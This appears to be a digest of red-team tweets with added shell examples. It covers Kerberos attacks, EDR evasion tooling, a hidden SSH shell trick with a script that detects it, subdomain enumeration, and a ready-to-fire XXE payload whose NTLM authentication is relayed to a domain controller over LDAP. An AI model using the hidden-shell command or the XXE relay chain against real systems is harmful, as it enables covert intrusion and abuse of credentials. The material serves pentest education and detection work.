[ VirtualAllocEx, Daniel Feichter ]
Nice blog post by @Microsoft in cooperation with AV-Comparatives about "Detecting and preventing LSASS credential dumping attacks"
https://t.co/0tML7Heax5
#itsec #itsicherheit #itsecurity #endpointsecurity #antivirus #lsass
https://www.microsoft.com/security/blog/2022/10/05/detecting-and-preventing-lsass-credential-dumping-attacks/
[ tweet ]
[ Tw1sm, Matt Creel ]
Created python tooling for the "Roast in the Middle" attack demoed/described by @exploitph in his recent PoC and research. Supports ARP spoofing to targets/gateway - if you can enum usernames and sniff an AS-REQ, basically allows for "unauth kerberoast" https://t.co/Hdn3wuIx7b
https://github.com/Tw1sm/RITM
[ tweet ]
[ snovvcrash, snovvcrash ]
Woo-hoo, there's a new kid in town for initial access credential acquiring! As we know from @mohemiv research, we don't necessarily need SPNs for Kerberoasting, so it's time to get ready for RID Cycling with ntlmrelayx[.]py
https://twitter.com/snovvcrash/status/1506286522655461386
[ tweet ][ quote ]
[ eversinc33, eversinc33 ]
Had some fun implementing the trampoline technique to make sure all syscalls go through NTDLL into the Nim HellsGate implementation by zimawhit3. Thank you @passthehashbrwn for the blog on hiding syscalls! (https://t.co/YfUqAglams)
https://t.co/IicLY1WkY4
https://passthehashbrowns.github.io/hiding-your-syscalls
https://github.com/eversinc33/HellsGate-Trampoline
[ tweet ]
[ Alh4zr3d, Alh4zr3d ]
Red Teamers, following my previous tweet on hiding procs, now we hide SSH connections:
"ssh -o UserKnownHostsFile=/dev/null -T user@target.com 'bash -i'"
Your user:
- is not added to /var/log/utmp
- won't appear in w or who cmd
- has no .profile or .bash_profile
#redteaming
[ tweet ]
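Added example, not from the tweet: the detection-side check for sessions opened this way. A `-T` session gets no pty and writes no utmp record, so `w` and `who` stay silent, but sshd still logs the login and the TCP session still sits in the socket table. The function below compares `ss` output for established sshd sockets against `who` and prints peer addresses that have a connection but no utmp entry. The `ss` and `who` samples are constructed; the commands in the final comment are what you would feed it on a live host.

```shell
#!/bin/sh
# Constructed sample of `ss -tnp state established` output (not from a real host).
# With a state filter ss prints no State column, so the peer is the 4th field.
SS_SAMPLE='Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
0      0      10.0.0.5:22          10.0.0.9:51522      users:(("sshd",pid=1423,fd=4))
0      0      10.0.0.5:22          10.0.0.7:40210      users:(("sshd",pid=1501,fd=4))
0      0      10.0.0.5:443         10.0.0.8:33001      users:(("nginx",pid=900,fd=6))'
# Constructed sample of `who` output: only the pty session from 10.0.0.9 is in utmp.
WHO_SAMPLE='alice    pts/0        2022-10-08 10:12 (10.0.0.9)'

# hidden_ssh_peers SS_OUTPUT WHO_OUTPUT
# Prints, one per line, peer addresses that hold an established sshd socket but
# have no utmp record (nothing in `who`): the -T / no-pty sessions from the tweet.
hidden_ssh_peers() {
  printf '%s\n' "$2" | awk -v ss="$1" '
    # who(1): the trailing parenthesised column is the source host
    match($0, /\([^)]*\)$/) { seen[substr($0, RSTART + 1, RLENGTH - 2)] = 1 }
    END {
      n = split(ss, lines, "\n")
      for (i = 1; i <= n; i++) {
        if (lines[i] !~ /users:\(\("sshd"/) continue   # keep sshd sockets only
        split(lines[i], f, "[ \t]+")
        peer = f[4]                                      # Peer Address:Port
        sub(/:[0-9]+$/, "", peer)                        # drop the source port
        if (!(peer in seen)) print peer
      }
    }'
}

# On a live host (run as root so ss can show the owning process; GNU `who --ips`
# makes both sides compare IP addresses rather than resolved names):
#   hidden_ssh_peers "$(ss -tnp state established)" "$(who --ips)"
hidden_ssh_peers "$SS_SAMPLE" "$WHO_SAMPLE"
```

The same no-pty sessions also show up in `ps -eo user,pid,ppid,tty,args` as a user shell with tty `?` whose parent is an sshd child, and in the sshd "Accepted publickey/password" lines in the auth log; this check is only the quickest of the three.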
[ HackingLZ, Justin Elze ]
This is awesome: Meterpreter gets BOF loader support for all your offensive needs. https://t.co/01W4UNgD1d
https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/
[ tweet ]
[ 0xcsandker, Carsten ]
Needed to find where a certain GPO was applied during the last engagement. Didn't have something ready to grab, so now I have. Inline and readable-friendly wrapped code here: https://t.co/EMJ2rJqvYn
https://gist.github.com/csandker/950d11632534c86012ab9c7cb592b7b5
[ tweet ]
[ m3g9tr0n, Spiros Fraganastasis ]
PeNet is a parser for Windows Portable Executable headers. It is completely written in C# and does not rely on any native Windows APIs. Furthermore, it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. https://t.co/MPZvqvocfO
https://github.com/secana/PeNet
[ tweet ]
[ KlezVirus, d3adc0de ]
[Video] The 4th episode of my series about Inceptor is out: "Empowering Donut with Direct and Indirect Syscalls".
In this video, we'll show how it is possible to improve the donut loader by integrating it with SW3.
https://t.co/xNK4HNz9qS
https://youtu.be/ypX7N4498xE
[ tweet ]
[ ippsec, ippsec ]
Starting to play more with Elastic, so just published a video installing v8 on Ubuntu 22. Really impressed with Fleet so far, the last time I played with Elastic it was a PITA keeping all the agent configs in sync. Fleet's auto update of agents is magic https://t.co/fbQkWgbJKW
https://www.youtube.com/watch?v=Ts-ofIVRMo4
[ tweet ]
[ dec0ne, Mor Davidovich ]
Introducing ShadowSpray, it's like password spray but with shadow credentials. More info in the repo.
Huge thanks to @elad_shamir for the amazing technique and to @harmj0y (and others) for the implementation in Rubeus from which a lot of code was taken.
https://t.co/nIsnmaitfw
https://github.com/Dec0ne/ShadowSpray/
[ tweet ]
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Quite an interesting article on how to bypass EDR with the help of python)))
https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
#redteam #pentest #bypass
[ n00py1, n00py ]
Web vulns you should look for on an internal pentest: XXE.
We often think of XXE as a way to read local files, but you can also use it to coerce auth. HTTP NTLM does not request signing so you can easily relay it to LDAP. Web service accounts are often over permissioned.
[ tweet ]
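Added example, not from the tweet, of the two halves of the chain n00py describes, with hypothetical lab addresses (10.0.0.99 as the attacker box, 10.0.0.10 as the DC, webapp.corp.local as the vulnerable application; all assumptions). `xxe_payload` builds a document whose external entity points at an HTTP listener on the attacker host; when the application's XML parser resolves it from a Windows host and answers the listener's 401 NTLM challenge with the web service account, impacket's `ntlmrelayx.py` can forward that authentication straight to LDAP on the DC, which is exactly the relay path HTTP NTLM leaves open because it never requests signing. Confirm the outbound callback with any plain HTTP listener first, and check whether the DC enforces LDAP signing, because an enforcing DC rejects the relayed bind. The curl step only runs when the script is invoked with `--fire`, so the file can be sourced or tested offline.

```shell
#!/bin/sh
# Hypothetical lab values (assumptions, not from the tweet)
ATTACKER=10.0.0.99                                  # host running ntlmrelayx
DC=10.0.0.10                                        # relay target: LDAP on the DC
TARGET_URL='http://webapp.corp.local/api/import'    # endpoint that parses client XML

# xxe_payload LISTENER_HOST
# Emits an XML document whose external entity is fetched over HTTP from
# LISTENER_HOST. Resolving &xxe; is what makes the server connect out; nothing
# has to be read back, the outbound request alone is the coercion.
xxe_payload() {
  cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://$1/coerce"> ]>
<data>&xxe;</data>
EOF
}

# Step 1, in a separate terminal on $ATTACKER: catch the HTTP NTLM auth and relay
# it to LDAP. With no extra action flags ntlmrelayx's LDAP attack dumps domain
# info (ldapdomaindump) into the loot directory given with -l.
relay_cmd() {
  printf 'ntlmrelayx.py -t ldap://%s --no-smb-server -l loot\n' "$DC"
}

# Step 2: submit the payload to the application and report the HTTP status
trigger_xxe() {
  xxe_payload "$ATTACKER" \
  | curl --silent -o /dev/null -w '%{http_code}\n' \
         -H 'Content-Type: application/xml' --data-binary @- "$TARGET_URL"
}

echo "relay listener:"; relay_cmd
echo "payload:";        xxe_payload "$ATTACKER"
if [ "${1:-}" = "--fire" ]; then trigger_xxe; fi
```

The payload deliberately carries no file read: for the coercion the entity's URL is the whole point, and a server that blocks external entities (the fix) will never make the request, which is also how you confirm the remediation afterwards.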
[ HackerGautam, Frooti ]
Not only crawling but you can do Subdomain Enumeration using Wayback.
# example.com is a placeholder for the target apex domain
curl --insecure --silent "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u
#bugbounty #hacking #infosec
[ tweet ]
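Added example, not from the tweet: the same CDX query wrapped in a function, plus a normaliser that turns archived URLs into unique in-scope hosts. The normaliser lowercases, strips scheme, path, userinfo, port and trailing dot, collapses a leading `www.`, and keeps only hosts under the requested apex, so a lookalike such as `example.com.attacker.net` is dropped instead of reported. Unlike the one-liner's `sed "/@/d"`, it strips the userinfo rather than discarding the line, so a host that only shows up behind embedded credentials is still found. The sample URLs are constructed; `wayback_hosts` is the live call.

```shell
#!/bin/sh
# normalize_hosts APEX
# Reads archived URLs on stdin (one per line, as `fl=original` returns them) and
# prints the unique hostnames under APEX. Steps: lowercase, strip scheme, path,
# userinfo, port and trailing dot, collapse a leading www., keep in-scope only.
normalize_hosts() {
  apex=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
  esc=$(printf '%s' "$apex" | sed 's/\./\\./g')   # escape dots for the grep below
  tr 'A-Z' 'a-z' \
  | sed -E -e 's#^[a-z][a-z0-9+.-]*://##' \
           -e 's#/.*$##' \
           -e 's#^[^@]*@##' \
           -e 's#:[0-9]*$##' \
           -e 's#\.$##' \
           -e 's#^www\.##' \
  | grep -E "(^|[.])${esc}\$" \
  | sort -u
}

# wayback_hosts APEX
# The CDX query the one-liner needs: url=*.APEX/* selects every archived
# subdomain, fl=original returns just the URL, collapse=urlkey dedupes captures.
wayback_hosts() {
  curl --silent "http://web.archive.org/cdx/search/cdx?url=*.$1/*&fl=original&collapse=urlkey" \
  | normalize_hosts "$1"
}

# Constructed sample standing in for CDX output (no network needed for the demo)
SAMPLE_URLS='https://www.Example.com/
http://a.example.com/x?y=1
https://user:pw@www.sub.example.com:8443/p
http://example.com./
http://example.com.attacker.net/'

printf '%s\n' "$SAMPLE_URLS" | normalize_hosts example.com
# Live use: wayback_hosts example.com
```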
[ snovvcrash, snovvcrash ]
This is how easter eggs are found @_nwodtuhs @podalirius_
[ tweet ]
[ ORCx41, ORCA ]
decided to release this, a highly capable pe packer, with a lot of nice features
https://t.co/iedhKbTlzm
https://github.com/ORCx41/AtomPePacker
[ tweet ]